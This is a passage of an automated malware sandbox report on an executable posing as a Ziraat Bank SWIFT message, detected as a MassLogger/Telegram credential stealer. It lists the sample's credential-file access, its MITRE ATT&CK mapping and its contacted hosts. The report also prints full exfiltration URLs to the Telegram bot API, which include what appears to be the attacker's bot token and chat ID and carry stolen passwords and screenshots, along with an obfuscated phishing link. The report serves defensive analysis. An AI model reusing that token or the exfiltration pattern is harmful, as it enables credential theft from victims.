                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected MassLogger RAT
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		13
                System Information Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts12
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		1
                Query Registry                		Remote Desktop Protocol1
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		Security Account Manager1
                Security Software Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS2
                Process Discovery                		Distributed Component Object Model1
                Email Collection                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets31
                Virtualization/Sandbox Evasion                		SSH1
                Input Capture                		14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNC1
                Clipboard Data                		Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Ziraat Bankasi Swift Mesaji.exe58%ReversingLabsWin32.Exploit.Generic
                Ziraat Bankasi Swift Mesaji.exe100%AviraHEUR/AGEN.1305388
                Ziraat Bankasi Swift Mesaji.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalse
                  		high
                  reallyfreegeoip.org
                  		172.67.177.134
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      		217.20.58.101
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		193.122.6.168
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://checkip.dyndns.org/false
                              		high
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://api.telegram.org/bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20Passwords%20/%208.46.123.189false
                                  		high
                                  https://api.telegram.org/bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO==========false
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://checkip.dyndns.orgZiraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgZiraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botZiraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZiraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/bot-/sendDocument?chat_id=Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.org/qZiraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.org/xml/Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse
                                                    193.122.6.168
                                                    		checkip.dyndns.comUnited States
                                                    		31898ORACLE-BMC-31898USfalse
                                                    172.67.177.134
                                                    		reallyfreegeoip.orgUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1574076
                                                    Start date and time:2024-12-12 21:37:39 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 27s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Ziraat Bankasi Swift Mesaji.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/4@4/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 93
                                                    • Number of non-executed functions: 67
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 199.232.214.172, 2.20.68.201, 2.20.68.210, 217.20.58.101, 23.218.208.109, 13.107.246.63, 52.149.20.212
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Ziraat Bankasi Swift Mesaji.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:38:31API Interceptor6035666x Sleep call for process: Ziraat Bankasi Swift Mesaji.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    149.154.167.220installer.exeGet hashmaliciousUnknownBrowse
                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                  Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                    T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                        193.122.6.168Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                        • checkip.dyndns.org/
                                                                        Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        bg.microsoft.map.fastly.netqWMEdD3xsu.dllGet hashmaliciousStrela StealerBrowse
                                                                        • 199.232.210.172
                                                                        IDqDMIZDPk.dllGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                        • 199.232.210.172
                                                                        9MQYWJVQut.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        Payment Remittance Advice Details.vbsGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        Dec_2024 Shipment Packing List.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                        • 199.232.210.172
                                                                        Payment Advice-Dec-2024.vbsGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        https://cdn.iobit.com/dl/driver_booster_setup.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        Payment Advice - Advice RefA1VcCagmbe12 Priority payment Customer Ref3509477.msgGet hashmaliciousXWormBrowse
                                                                        • 199.232.210.172
                                                                        api.telegram.orginstaller.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        installer.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                        • 149.154.167.220
                                                                        Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                        • 149.154.167.220
                                                                        reallyfreegeoip.orgTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 104.21.67.152
                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 104.21.67.152
                                                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                        • 104.21.67.152
                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 104.21.67.152
                                                                        QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ORACLE-BMC-31898USTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                        • 192.29.14.118
                                                                        Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 193.122.6.168
                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 193.122.6.168
                                                                        Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 193.122.6.168
                                                                        Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 140.238.49.71
                                                                        Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        TELEGRAMRUfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                        • 149.154.167.99
                                                                        installer.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        installer.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 149.154.167.99
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 149.154.167.99
                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                        • 149.154.167.220
                                                                        CLOUDFLARENETUSEuro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                        • 162.159.129.233
                                                                        ltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                        • 172.67.216.167
                                                                        htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.206.64
                                                                        0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 172.67.185.252
                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 104.21.112.1
                                                                        http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.159.113
                                                                        https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.20.58
                                                                        http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.21.58
                                                                        https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                        • 172.64.151.8

                                                                        JA3 Fingerprints

